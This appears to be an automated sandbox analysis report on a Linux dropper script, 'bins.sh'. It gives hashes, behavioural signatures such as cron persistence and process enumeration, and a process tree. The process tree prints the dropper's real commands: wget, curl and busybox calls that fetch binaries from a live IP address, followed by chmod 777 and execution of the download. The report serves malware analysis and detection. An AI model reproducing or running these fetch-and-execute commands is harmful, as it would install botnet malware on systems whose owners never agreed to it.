Analysis
-
max time kernel
149s -
max time network
105s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhf image:debian9-armhf-20240611-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system -
submitted
25-11-2024 17:05
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
ff11827cacbdfc494c394c5d8e7272db
-
SHA1
9acddf73007240f35b04f7fe4732d47cd0b04137
-
SHA256
10e3e3e76552e191e9c880e374448c94e4d9ea8b76337345ffed3305d3b6722e
-
SHA512
a045f1446bdb8160644c1e258d5a17327dc5d81b05bda3fddbe70b00007d6b63363d4b98f10a9c1fbcdf87befe5a73a543a4e0f7728feae5ad0e053384968958
-
SSDEEP
192:JBVtKqN2M/XoDM9VR9/9d9k9I9NGjOHBVtKq8sXU9VR9/9d9k9I9Ton:t2MfoDM9X9/9d9k9I9NG6m2U9X9/9d9y
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 754 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr 755 VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr -
Renames itself 1 IoCs
pid Process 756 VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows tasks to run on a schedule and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.fQai3w crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information that may indicate whether the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/146/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/572/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/filesystems crontab File opened for reading /proc/12/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/22/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/772/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/filesystems crontab File opened for reading /proc/135/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/267/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/300/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/643/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/782/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/784/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/15/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/24/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/25/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/20/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/105/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/136/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/264/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/283/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/self/auxv curl File opened for reading /proc/16/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/18/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/778/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/786/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/792/cmdline 
VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/304/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/590/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/767/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/107/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/314/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/765/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/774/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/776/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/6/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/13/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/23/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/649/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/2/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/8/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/640/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/138/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/752/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/4/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/17/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/43/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/7/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/42/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/14/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/19/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/28/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/642/cmdline 
VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/764/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/9/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/10/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/11/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/154/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/166/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/27/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/29/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/41/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/309/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/585/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process
File opened for modification /tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr wget
File opened for modification /tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr curl
File opened for modification /tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr busybox
Processes
-
/tmp/bins.sh /tmp/bins.sh 1⤵ PID:643
-
/bin/rm /bin/rm bins.sh 2⤵ PID:645
-
-
/usr/bin/wget wget http://216.126.231.240/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr 2⤵
- Writes file to tmp directory
PID:647
-
-
/usr/bin/curl curl -O http://216.126.231.240/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr 2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:672
-
-
/bin/busybox /bin/busybox wget http://216.126.231.240/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr 2⤵
- Writes file to tmp directory
PID:753
-
-
/bin/chmod chmod 777 VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr 2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr ./VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr 2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:755 -
/bin/sh sh -c "crontab -l" 3⤵ PID:757
-
/usr/bin/crontab crontab -l 4⤵
- Reads runtime system information
PID:758
-
-
-
/bin/sh sh -c "crontab -" 3⤵ PID:759
-
/usr/bin/crontab crontab - 4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:760
-
-
-
-
/bin/rm rm VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr 2⤵ PID:762
-
-
/usr/bin/wget wget http://216.126.231.240/bins/cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR 2⤵ PID:765
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
119KB
MD5 1b166b95f9cb4b079ef1b9ec8363ddf3
SHA1 0d8eb08add467b3b5474f9b25909297fe7c2839c
SHA256 94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9
SHA512 983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925
-
Filesize
210B
MD5 a8cdc9a79470432ff818c1f0cb667f99
SHA1 23cd257383dd969652ba19f24da2c9dd776adb98
SHA256 c7ae0dd4be7775c6bbfbdd64d1fefdb2a8440ea7ef863d7d7eddd9ce627b607c
SHA512 34c30829afd60c3593dae14e9f623afdab62bddc7c29b61a396d24e9d9c52819bbf4ac1cd7691977678c81eb1f76735f74155a97e181e0bc2d1533a62c94265d